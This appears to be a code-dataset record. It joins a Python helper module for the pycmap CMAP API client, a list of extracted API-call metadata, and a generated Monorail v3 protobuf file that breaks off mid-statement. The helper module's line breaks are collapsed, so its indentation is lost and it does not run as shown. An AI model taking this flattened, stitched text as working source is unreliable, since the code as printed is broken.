""" Author: Mohammad Dehghani Ashkezari <[email protected]> Date: 2019-06-28 Function: Host a collection of shared multi-purpose helper functions. """ import os import sys from tqdm import tqdm from colorama import Fore, Back, Style, init import numpy as np import pandas as pd import webbrowser import IPython MAX_ROWS = 2000000 MAX_SAMPLE_SOURCE = 500000 def halt(msg): """Prints an error message and terminates the program.""" msg = '\n' + msg init(convert=True) print(Fore.RED + msg, file=sys.stderr) print(Style.RESET_ALL, end='') sys.exit(1) return def print_tqdm(msg, err=False): """Print helper function compatible with tqdmm progressbar.""" # init() msg = '\n' + msg if err: tqdm.write(Fore.RED + msg) else: tqdm.write(msg) tqdm.write(Style.RESET_ALL, end='') return def get_base_url(): """Returns API root endpoint.""" return os.environ.get( 'CMAP_API_BASE_URL', 'https://simonscmap.com').rstrip('/') def jupytered(): """Returns True if jupyter notebook has invoked the package.""" jup = False import __main__ as main if not hasattr(main, '__file__'): jup = True return jup def inline(): """ Checks if the package results should get prepared for an "inline" context. Currently, just calls the jupytered function. """ return jupytered() def make_filename_by_table_var(table, variable, prefix=''): """Generate a filename (without extention) using table and variable names.""" if prefix != '': prefix += '_' return prefix + variable + '_' + table def canvas_rect(dw, dh): """Resizes a canvas dimensions so that it better fits on client browser.""" ar = dw / dh h = 400 if ar > 3 else 500 w_min = 300 w_max = 1000 w = int(ar * h) if w > w_max: w = w_max if w < w_min: w = w_min return w, h def get_data_limits(data, quant=0.05): """Returns low and high quantile limits of a numeric array.""" data = np.array(data).flatten() return np.nanquantile(data, quant), np.nanquantile(data, 1-quant) # def get_token(token=None): # token = token or os.environ.get('CMAP_API_KEY') # if token in [None, '']: # halt('API Key must be specified to access CMAP API') # return token def config_path(): """Returns the path to the config spreadsheet file.""" return os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config.csv') def initiate_config_file(token, vizEngine, exportDir, exportFormat, figureDir): """Creates a .csv file hosting the primary project configs """ if vizEngine is None: vizEngine = 'plotly' if exportDir is None: exportDir = './export/' if exportFormat is None: exportFormat = '.csv' if figureDir is None: figureDir = './figure/' config = { 'token': [token], 'vizEngine': [vizEngine], 'exportDir': [exportDir], 'exportFormat': [exportFormat], 'figureDir': [figureDir] } pd.DataFrame(config).to_csv(config_path(), index=False) return def remove_angle_brackets(token): """Removes angle brackets at start and end of the token, if exist.""" if token is not None: if token[0] == '<': token = token[1:] if token[-1] == '>': token = token[:-1] return token def save_config(token=None, vizEngine=None, exportDir=None, exportFormat=None, figureDir=None): """Updates the project's configs at the config spreadsheet.""" configPath = config_path() if not os.path.isfile(configPath): initiate_config_file(token, vizEngine, exportDir, exportFormat, figureDir) df = pd.read_csv(configPath) if token is not None: df['token'] = remove_angle_brackets(token) if vizEngine is not None: supportedVizEngines = ['bokeh', 'plotly'] if vizEngine not in supportedVizEngines: halt('%s is not a supported visualization library' % vizEngine) df['vizEngine'] = 
vizEngine if exportDir is not None: df['exportDir'] = exportDir if exportFormat is not None: df['exportFormat'] = exportFormat if figureDir is not None: df['figureDir'] = figureDir df.to_csv(configPath, index=False) return def load_config(): """Loads the config spreadsheet and returns it as a dataframe.""" configPath = config_path() if not os.path.isfile(configPath): msg = '\nAPI key not found!\n' msg = msg + 'Please pass the API key using the following code:\n' msg = msg + 'import pycmap\n' msg = msg + 'pycmap.API(<api_key>)\n' halt(msg) return pd.read_csv(configPath) def get_token(): """Returns the API key.""" return remove_angle_brackets(load_config()['token'][0]) def get_vizEngine(): """Returns the visualization library name.""" return load_config()['vizEngine'][0] def get_export_dir(): """Returns the path to the export directory.""" return load_config()['exportDir'][0] def get_export_format(): """Returns the file format of the exported files.""" return load_config()['exportFormat'][0] def get_figure_dir(): """Returns the path to the figure directory.""" return load_config()['figureDir'][0] def get_bokeh_tools(): """Returns a list tools used along with a bokeh graph.""" return 'crosshair,pan,zoom_in,wheel_zoom,zoom_out,box_zoom,reset,save' def normalize(vals, min_max=False): """Takes an array and either normalize to min/max, standardize it (remove the mean and divide by standard deviation).""" if min_max: normalized_vals=(vals-np.nanmin(vals))/(np.nanmax(vals)-np.nanmin(vals)) else: normalized_vals=(vals-np.nanmean(vals))/np.nanstd(vals) return normalized_vals def open_HTML(path): """Display HTML file by defaut browser or inline in case jupyter is the caller.""" if jupytered(): vObj = IPython.display.IFrame(path, width=800, height=400) IPython.display.display(vObj) else: path = 'file://' + os.path.realpath(path) webbrowser.open(path, new=2) return
[((24, 8, 24, 26), 'colorama.init', 'init', (), '', False, 'from colorama import Fore, Back, Style, init\n'), ((27, 8, 27, 19), 'sys.exit', 'sys.exit', ({(27, 17, 27, 18): '(1)'}, {}), '(1)', False, 'import sys\n'), ((38, 8, 38, 43), 'tqdm.tqdm.write', 'tqdm.write', (), '', False, 'from tqdm import tqdm\n'), ((136, 13, 136, 36), 'pandas.read_csv', 'pd.read_csv', ({(136, 25, 136, 35): 'configPath'}, {}), '(configPath)', True, 'import pandas as pd\n'), ((163, 15, 163, 38), 'pandas.read_csv', 'pd.read_csv', ({(163, 27, 163, 37): 'configPath'}, {}), '(configPath)', True, 'import pandas as pd\n'), ((35, 16, 35, 42), 'tqdm.tqdm.write', 'tqdm.write', ({(35, 27, 35, 41): '(Fore.RED + msg)'}, {}), '(Fore.RED + msg)', False, 'from tqdm import tqdm\n'), ((37, 16, 37, 31), 'tqdm.tqdm.write', 'tqdm.write', ({(37, 27, 37, 30): 'msg'}, {}), '(msg)', False, 'from tqdm import tqdm\n'), ((84, 15, 84, 42), 'numpy.nanquantile', 'np.nanquantile', ({(84, 30, 84, 34): 'data', (84, 36, 84, 41): 'quant'}, {}), '(data, quant)', True, 'import numpy as np\n'), ((84, 44, 84, 73), 'numpy.nanquantile', 'np.nanquantile', ({(84, 59, 84, 63): 'data', (84, 65, 84, 72): '(1 - quant)'}, {}), '(data, 1 - quant)', True, 'import numpy as np\n'), ((134, 15, 134, 41), 'os.path.isfile', 'os.path.isfile', ({(134, 30, 134, 40): 'configPath'}, {}), '(configPath)', False, 'import os\n'), ((157, 15, 157, 41), 'os.path.isfile', 'os.path.isfile', ({(157, 30, 157, 40): 'configPath'}, {}), '(configPath)', False, 'import os\n'), ((204, 15, 204, 66), 'IPython.display.IFrame', 'IPython.display.IFrame', (), '', False, 'import IPython\n'), ((205, 8, 205, 37), 'IPython.display.display', 'IPython.display.display', ({(205, 32, 205, 36): 'vObj'}, {}), '(vObj)', False, 'import IPython\n'), ((208, 8, 208, 36), 'webbrowser.open', 'webbrowser.open', (), '', False, 'import webbrowser\n'), ((43, 15, 44, 54), 'os.environ.get', 'os.environ.get', ({(44, 8, 44, 27): '"""CMAP_API_BASE_URL"""', (44, 29, 44, 53): '"""https://simonscmap.com"""'}, {}), "('CMAP_API_BASE_URL', 'https://simonscmap.com')", False, 'import os\n'), ((83, 15, 83, 29), 'numpy.array', 'np.array', ({(83, 24, 83, 28): 'data'}, {}), '(data)', True, 'import numpy as np\n'), ((104, 44, 104, 70), 'os.path.realpath', 'os.path.realpath', ({(104, 61, 104, 69): '__file__'}, {}), '(__file__)', False, 'import os\n'), ((120, 8, 120, 28), 'pandas.DataFrame', 'pd.DataFrame', ({(120, 21, 120, 27): 'config'}, {}), '(config)', True, 'import pandas as pd\n'), ((197, 48, 197, 63), 'numpy.nanstd', 'np.nanstd', ({(197, 58, 197, 62): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((207, 27, 207, 49), 'os.path.realpath', 'os.path.realpath', ({(207, 44, 207, 48): 'path'}, {}), '(path)', False, 'import os\n'), ((195, 30, 195, 45), 'numpy.nanmin', 'np.nanmin', ({(195, 40, 195, 44): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((195, 48, 195, 63), 'numpy.nanmax', 'np.nanmax', ({(195, 58, 195, 62): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((195, 64, 195, 79), 'numpy.nanmin', 'np.nanmin', ({(195, 74, 195, 78): 'vals'}, {}), '(vals)', True, 'import numpy as np\n'), ((197, 30, 197, 46), 'numpy.nanmean', 'np.nanmean', ({(197, 41, 197, 45): 'vals'}, {}), '(vals)', True, 'import numpy as np\n')]
fknittel/git-retry-build
appengine/monorail/api/v3/api_proto/projects_pb2.py
4d57dd6e8b7567daeb24b55f66bc5becd3d459f3
# -*- coding: utf-8 -*- # Generated by the protocol buffer compiler. DO NOT EDIT! # source: api/v3/api_proto/projects.proto """Generated protocol buffer code.""" from google.protobuf import descriptor as _descriptor from google.protobuf import message as _message from google.protobuf import reflection as _reflection from google.protobuf import symbol_database as _symbol_database # @@protoc_insertion_point(imports) _sym_db = _symbol_database.Default() from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2 from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2 from google.api import resource_pb2 as google_dot_api_dot_resource__pb2 from api.v3.api_proto import project_objects_pb2 as api_dot_v3_dot_api__proto_dot_project__objects__pb2 DESCRIPTOR = _descriptor.FileDescriptor( name='api/v3/api_proto/projects.proto', package='monorail.v3', syntax='proto3', serialized_options=b'Z!infra/monorailv2/api/v3/api_proto', create_key=_descriptor._internal_create_key, serialized_pb=b'\n\x1f\x61pi/v3/api_proto/projects.proto\x12\x0bmonorail.v3\x1a\x1bgoogle/protobuf/empty.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a&api/v3/api_proto/project_objects.proto\"t\n\x15\x43reateFieldDefRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xe0\x41\x02\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\x12,\n\x08\x66ielddef\x18\x02 \x01(\x0b\x32\x15.monorail.v3.FieldDefB\x03\xe0\x41\x02\"J\n\x16GetComponentDefRequest\x12\x30\n\x04name\x18\x01 \x01(\tB\"\xfa\x41\x1c\n\x1a\x61pi.crbug.com/ComponentDef\xe0\x41\x02\"\x81\x01\n\x19\x43reateComponentDefRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xe0\x41\x02\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\x12\x35\n\rcomponent_def\x18\x02 \x01(\x0b\x32\x19.monorail.v3.ComponentDefB\x03\xe0\x41\x02\"M\n\x19\x44\x65leteComponentDefRequest\x12\x30\n\x04name\x18\x01 \x01(\tB\"\xe0\x41\x02\xfa\x41\x1c\n\x1a\x61pi.crbug.com/ComponentDef\"q\n\x19ListIssueTemplatesRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\xe0\x41\x02\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\"d\n\x1aListIssueTemplatesResponse\x12-\n\ttemplates\x18\x01 \x03(\x0b\x32\x1a.monorail.v3.IssueTemplate\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t\"p\n\x18ListComponentDefsRequest\x12-\n\x06parent\x18\x01 \x01(\tB\x1d\xfa\x41\x17\n\x15\x61pi.crbug.com/Project\xe0\x41\x02\x12\x11\n\tpage_size\x18\x02 \x01(\x05\x12\x12\n\npage_token\x18\x03 \x01(\t\"g\n\x19ListComponentDefsResponse\x12\x31\n\x0e\x63omponent_defs\x18\x01 \x03(\x0b\x32\x19.monorail.v3.ComponentDef\x12\x17\n\x0fnext_page_token\x18\x02 \x01(\t\"<\n\x13ListProjectsRequest\x12\x11\n\tpage_size\x18\x01 \x01(\x05\x12\x12\n\npage_token\x18\x02 \x01(\t\"W\n\x14ListProjectsResponse\x12&\n\x08projects\x18\x01 \x03(\x0b\x32\x14.monorail.v3.Project\x12\x17\n\x0fnext_page_token\x18\x02 
\x01(\t2\x87\x05\n\x08Projects\x12M\n\x0e\x43reateFieldDef\x12\".monorail.v3.CreateFieldDefRequest\x1a\x15.monorail.v3.FieldDef\"\x00\x12S\n\x0fGetComponentDef\x12#.monorail.v3.GetComponentDefRequest\x1a\x19.monorail.v3.ComponentDef\"\x00\x12Y\n\x12\x43reateComponentDef\x12&.monorail.v3.CreateComponentDefRequest\x1a\x19.monorail.v3.ComponentDef\"\x00\x12V\n\x12\x44\x65leteComponentDef\x12&.monorail.v3.DeleteComponentDefRequest\x1a\x16.google.protobuf.Empty\"\x00\x12g\n\x12ListIssueTemplates\x12&.monorail.v3.ListIssueTemplatesRequest\x1a\'.monorail.v3.ListIssueTemplatesResponse\"\x00\x12\x64\n\x11ListComponentDefs\x12%.monorail.v3.ListComponentDefsRequest\x1a&.monorail.v3.ListComponentDefsResponse\"\x00\x12U\n\x0cListProjects\x12 .monorail.v3.ListProjectsRequest\x1a!.monorail.v3.ListProjectsResponse\"\x00\x42#Z!infra/monorailv2/api/v3/api_protob\x06proto3' , dependencies=[google_dot_protobuf_dot_empty__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,api_dot_v3_dot_api__proto_dot_project__objects__pb2.DESCRIPTOR,]) _CREATEFIELDDEFREQUEST = _descriptor.Descriptor( name='CreateFieldDefRequest', full_name='monorail.v3.CreateFieldDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.CreateFieldDefRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\027\n\025api.crbug.com/Project', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='fielddef', full_name='monorail.v3.CreateFieldDefRequest.fielddef', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=177, serialized_end=293, ) _GETCOMPONENTDEFREQUEST = _descriptor.Descriptor( name='GetComponentDefRequest', full_name='monorail.v3.GetComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='name', full_name='monorail.v3.GetComponentDefRequest.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\034\n\032api.crbug.com/ComponentDef\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=295, serialized_end=369, ) _CREATECOMPONENTDEFREQUEST = _descriptor.Descriptor( name='CreateComponentDefRequest', full_name='monorail.v3.CreateComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', 
full_name='monorail.v3.CreateComponentDefRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\027\n\025api.crbug.com/Project', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='component_def', full_name='monorail.v3.CreateComponentDefRequest.component_def', index=1, number=2, type=11, cpp_type=10, label=1, has_default_value=False, default_value=None, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=372, serialized_end=501, ) _DELETECOMPONENTDEFREQUEST = _descriptor.Descriptor( name='DeleteComponentDefRequest', full_name='monorail.v3.DeleteComponentDefRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='name', full_name='monorail.v3.DeleteComponentDefRequest.name', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\340A\002\372A\034\n\032api.crbug.com/ComponentDef', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=503, serialized_end=580, ) _LISTISSUETEMPLATESREQUEST = _descriptor.Descriptor( name='ListIssueTemplatesRequest', full_name='monorail.v3.ListIssueTemplatesRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.ListIssueTemplatesRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\027\n\025api.crbug.com/Project\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListIssueTemplatesRequest.page_size', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListIssueTemplatesRequest.page_token', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=582, serialized_end=695, ) 
_LISTISSUETEMPLATESRESPONSE = _descriptor.Descriptor( name='ListIssueTemplatesResponse', full_name='monorail.v3.ListIssueTemplatesResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='templates', full_name='monorail.v3.ListIssueTemplatesResponse.templates', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListIssueTemplatesResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=697, serialized_end=797, ) _LISTCOMPONENTDEFSREQUEST = _descriptor.Descriptor( name='ListComponentDefsRequest', full_name='monorail.v3.ListComponentDefsRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='parent', full_name='monorail.v3.ListComponentDefsRequest.parent', index=0, number=1, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=b'\372A\027\n\025api.crbug.com/Project\340A\002', file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListComponentDefsRequest.page_size', index=1, number=2, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListComponentDefsRequest.page_token', index=2, number=3, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=799, serialized_end=911, ) _LISTCOMPONENTDEFSRESPONSE = _descriptor.Descriptor( name='ListComponentDefsResponse', full_name='monorail.v3.ListComponentDefsResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='component_defs', full_name='monorail.v3.ListComponentDefsResponse.component_defs', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), 
_descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListComponentDefsResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=913, serialized_end=1016, ) _LISTPROJECTSREQUEST = _descriptor.Descriptor( name='ListProjectsRequest', full_name='monorail.v3.ListProjectsRequest', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='page_size', full_name='monorail.v3.ListProjectsRequest.page_size', index=0, number=1, type=5, cpp_type=1, label=1, has_default_value=False, default_value=0, message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='page_token', full_name='monorail.v3.ListProjectsRequest.page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1018, serialized_end=1078, ) _LISTPROJECTSRESPONSE = _descriptor.Descriptor( name='ListProjectsResponse', full_name='monorail.v3.ListProjectsResponse', filename=None, file=DESCRIPTOR, containing_type=None, create_key=_descriptor._internal_create_key, fields=[ _descriptor.FieldDescriptor( name='projects', full_name='monorail.v3.ListProjectsResponse.projects', index=0, number=1, type=11, cpp_type=10, label=3, has_default_value=False, default_value=[], message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), _descriptor.FieldDescriptor( name='next_page_token', full_name='monorail.v3.ListProjectsResponse.next_page_token', index=1, number=2, type=9, cpp_type=9, label=1, has_default_value=False, default_value=b"".decode('utf-8'), message_type=None, enum_type=None, containing_type=None, is_extension=False, extension_scope=None, serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key), ], extensions=[ ], nested_types=[], enum_types=[ ], serialized_options=None, is_extendable=False, syntax='proto3', extension_ranges=[], oneofs=[ ], serialized_start=1080, serialized_end=1167, ) _CREATEFIELDDEFREQUEST.fields_by_name['fielddef'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._FIELDDEF _CREATECOMPONENTDEFREQUEST.fields_by_name['component_def'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF _LISTISSUETEMPLATESRESPONSE.fields_by_name['templates'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._ISSUETEMPLATE _LISTCOMPONENTDEFSRESPONSE.fields_by_name['component_defs'].message_type = 
api_dot_v3_dot_api__proto_dot_project__objects__pb2._COMPONENTDEF _LISTPROJECTSRESPONSE.fields_by_name['projects'].message_type = api_dot_v3_dot_api__proto_dot_project__objects__pb2._PROJECT DESCRIPTOR.message_types_by_name['CreateFieldDefRequest'] = _CREATEFIELDDEFREQUEST DESCRIPTOR.message_types_by_name['GetComponentDefRequest'] = _GETCOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['CreateComponentDefRequest'] = _CREATECOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['DeleteComponentDefRequest'] = _DELETECOMPONENTDEFREQUEST DESCRIPTOR.message_types_by_name['ListIssueTemplatesRequest'] = _LISTISSUETEMPLATESREQUEST DESCRIPTOR.message_types_by_name['ListIssueTemplatesResponse'] = _LISTISSUETEMPLATESRESPONSE DESCRIPTOR.message_types_by_name['ListComponentDefsRequest'] = _LISTCOMPONENTDEFSREQUEST DESCRIPTOR.message_types_by_name['ListComponentDefsResponse'] = _LISTCOMPONENTDEFSRESPONSE DESCRIPTOR.message_types_by_name['ListProjectsRequest'] = _LISTPROJECTSREQUEST DESCRIPTOR.message_types_by_name['ListProjectsResponse'] = _LISTPROJECTSRESPONSE _sym_db.RegisterFileDescriptor(DESCRIPTOR) CreateFieldDefRequest = _reflection.GeneratedProtocolMessageType('CreateFieldDefRequest', (_message.Message,), { 'DESCRIPTOR' : _CREATEFIELDDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.CreateFieldDefRequest) }) _sym_db.RegisterMessage(CreateFieldDefRequest) GetComponentDefRequest = _reflection.GeneratedProtocolMessageType('GetComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _GETCOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.GetComponentDefRequest) }) _sym_db.RegisterMessage(GetComponentDefRequest) CreateComponentDefRequest = _reflection.GeneratedProtocolMessageType('CreateComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _CREATECOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.CreateComponentDefRequest) }) _sym_db.RegisterMessage(CreateComponentDefRequest) DeleteComponentDefRequest = _reflection.GeneratedProtocolMessageType('DeleteComponentDefRequest', (_message.Message,), { 'DESCRIPTOR' : _DELETECOMPONENTDEFREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.DeleteComponentDefRequest) }) _sym_db.RegisterMessage(DeleteComponentDefRequest) ListIssueTemplatesRequest = _reflection.GeneratedProtocolMessageType('ListIssueTemplatesRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTISSUETEMPLATESREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListIssueTemplatesRequest) }) _sym_db.RegisterMessage(ListIssueTemplatesRequest) ListIssueTemplatesResponse = _reflection.GeneratedProtocolMessageType('ListIssueTemplatesResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTISSUETEMPLATESRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListIssueTemplatesResponse) }) _sym_db.RegisterMessage(ListIssueTemplatesResponse) ListComponentDefsRequest = _reflection.GeneratedProtocolMessageType('ListComponentDefsRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTCOMPONENTDEFSREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListComponentDefsRequest) }) _sym_db.RegisterMessage(ListComponentDefsRequest) ListComponentDefsResponse = 
_reflection.GeneratedProtocolMessageType('ListComponentDefsResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTCOMPONENTDEFSRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListComponentDefsResponse) }) _sym_db.RegisterMessage(ListComponentDefsResponse) ListProjectsRequest = _reflection.GeneratedProtocolMessageType('ListProjectsRequest', (_message.Message,), { 'DESCRIPTOR' : _LISTPROJECTSREQUEST, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListProjectsRequest) }) _sym_db.RegisterMessage(ListProjectsRequest) ListProjectsResponse = _reflection.GeneratedProtocolMessageType('ListProjectsResponse', (_message.Message,), { 'DESCRIPTOR' : _LISTPROJECTSRESPONSE, '__module__' : 'api.v3.api_proto.projects_pb2' # @@protoc_insertion_point(class_scope:monorail.v3.ListProjectsResponse) }) _sym_db.RegisterMessage(ListProjectsResponse) DESCRIPTOR._options = None _CREATEFIELDDEFREQUEST.fields_by_name['parent']._options = None _CREATEFIELDDEFREQUEST.fields_by_name['fielddef']._options = None _GETCOMPONENTDEFREQUEST.fields_by_name['name']._options = None _CREATECOMPONENTDEFREQUEST.fields_by_name['parent']._options = None _CREATECOMPONENTDEFREQUEST.fields_by_name['component_def']._options = None _DELETECOMPONENTDEFREQUEST.fields_by_name['name']._options = None _LISTISSUETEMPLATESREQUEST.fields_by_name['parent']._options = None _LISTCOMPONENTDEFSREQUEST.fields_by_name['parent']._options = None _PROJECTS = _descriptor.ServiceDescriptor( name='Projects', full_name='monorail.v3.Projects', file=DESCRIPTOR, index=0, serialized_options=None, create_key=_descriptor._internal_create_key, 